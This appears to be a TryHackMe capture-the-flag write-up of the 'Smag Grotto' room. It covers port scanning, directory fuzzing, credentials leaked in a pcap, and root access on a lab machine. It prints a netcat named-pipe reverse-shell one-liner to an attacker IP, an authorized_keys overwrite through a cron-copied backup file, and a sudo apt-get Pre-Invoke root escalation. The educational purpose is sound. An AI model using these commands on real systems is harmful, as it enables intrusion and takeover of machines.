Smag_Grotto TryHackMe
Level: Easy
Lets get started
Recon
PortScanning
command:sudo nmap -A 10.10.161.219 -T4 -v -p-
# Nmap 7.93 scan initiated Mon Jun 26 10:13:41 2023 as: nmap -A -T4 -v -p- -oN smag_grotto 10.10.161.219
Increasing send delay for 10.10.161.219 from 0 to 5 due to 1587 out of 3966 dropped probes since last increase.
Increasing send delay for 10.10.161.219 from 5 to 10 due to 11 out of 19 dropped probes since last increase.
Nmap scan report for 10.10.161.219
Host is up (0.25s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 74e0e1b405856a15687e16daf2c76bee (RSA)
| 256 bd4362b9a1865136f8c7dff90f638fa3 (ECDSA)
|_ 256 f9e7da078f10af970b3287c932d71b76 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Smag
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
Aggressive OS guesses: Linux 5.4 (96%), ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.16 (94%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.10 - 3.13 (92%), Linux 3.2 - 3.16 (92%), Linux 3.2 - 4.9 (92%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Crestron XPanel control system (91%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.003 days (since Mon Jun 26 10:29:34 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 5900/tcp)
HOP RTT ADDRESS
1 264.81 ms 10.8.0.1
2 264.86 ms 10.10.161.219
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 26 10:34:03 2023 -- 1 IP address (1 host up) scanned in 1222.08 seconds
From our scan we have 2 open ports, port 22 which runs ssh and port 80 which runs http. Enumeration today will be focused on port 80.
Enumeration
Navigating to the webpage
We get the message âthis site is still heavily under developmentâ. I checked the web source page well there was nothing there.
Firing up our directory enumeration tool
command:ffuf -u "http://10.10.161.219/FUZZ" -w /usr/share/wordlists/dirb/common.txt -e .zip,.sql,.php,.phtml,.bak,.backup
âââ(bl4ck4nonăżbl4ck4non)-[~/Downloads/TryHackMe/smag_grotto]
ââ$ ffuf -u "http://10.10.161.219/FUZZ" -w /usr/share/wordlists/dirb/common.txt -e .zip,.sql,.php,.phtml,.bak,.backup
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.161.219/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .zip .sql .php .phtml .bak .backup
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
index.php [Status: 200, Size: 402, Words: 69, Lines: 13, Duration: 225ms]
index.php [Status: 200, Size: 402, Words: 69, Lines: 13, Duration: 214ms]
mail [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 216ms]
:: Progress: [32298/32298] :: Job [1/1] :: 211 req/sec :: Duration: [0:03:10] :: Errors: 0 ::
Cool, we found a /mail directory
Navigating to that directory
We are able to read their mails, the mail contains a pcap file. Lets download the file to our machine and analyze it.
cool stuff, weâll be analyzing this pcap file by using a tool called wireshark, this tool comes preinstalled with the kali linux operating system
After checking for a little while, I found something interetsing
Right-clicking on âHTTPâ and following the âTCPâ stream
cool stuff heheđ. We found a hostname, a username and a password.
Lets add the hostname to our /etc/hosts file
Navigating to the webpage
Clicking on admin.php
We are required to log in. Weâll be using the creds we found earlier when we were analyzing the pcap file
username:helpdesk password:cH4nG3M3_n0w
Nice, we are logged in.
Enter a command?? How about we try the command âflyâ?? lool just kidding. We are required to use Linux commands here
Lets start with id and whoami. Using these commands doesnât display any output. So I went ahead to get a shell.
Payload:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.133.215 1234 >/tmp/f
You can edit the IP address to that of your kali machine.
Setting up our netcat listener
Now, lets paste the payload
Checking our netcat listener;
Cool, we got a shell
Stabilizing the shell
commands:
python3 -c "import pty;pty.spawn('/bin/bash')"
ctrl + z (to background)
stty raw -echo;fg
export TERM=screen
Now, lets go ahead and escalate our privileges
Privilege Escalation
So I found a cronjob running
command:cat /etc/crontab
So we can write into .ssh/authorized_keys
Now, lets generate our own ssh key using the ssh-keygen command
command:ssh-keygen -f gabimaru
I used the name gabimaru, You can choose to use a name of your choice though
So, weâll be echoing gabimaru.md into .backups/jake_id_rsa.pub.backup
Letâs send the file over to the targetâs machine first
Now, lets overwrite the file
command:cp gabimaru.pub /opt/.backups/jake_id_rsa.pub.backup
Now, that was successful. Lets wait a few mins then we can go ahead and log in as user jake
command:ssh jake@10.10.161.219 -i gabimaru
cool, we have a shell as user jake
Further escalating our privileges
Checking to see the programs sudo allows the user to run
command:sudo -l
User jake can run the apt-get command with sudo privileges.
Sweetđ, lets use this to escalate our privileges
Picking a payload from GTFOBins
payload:sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
Lets just paste this to the target machine. Hopefully weâll get a shell as root
Cool stuff, we got a shell as root
That will be all for today
Back To Home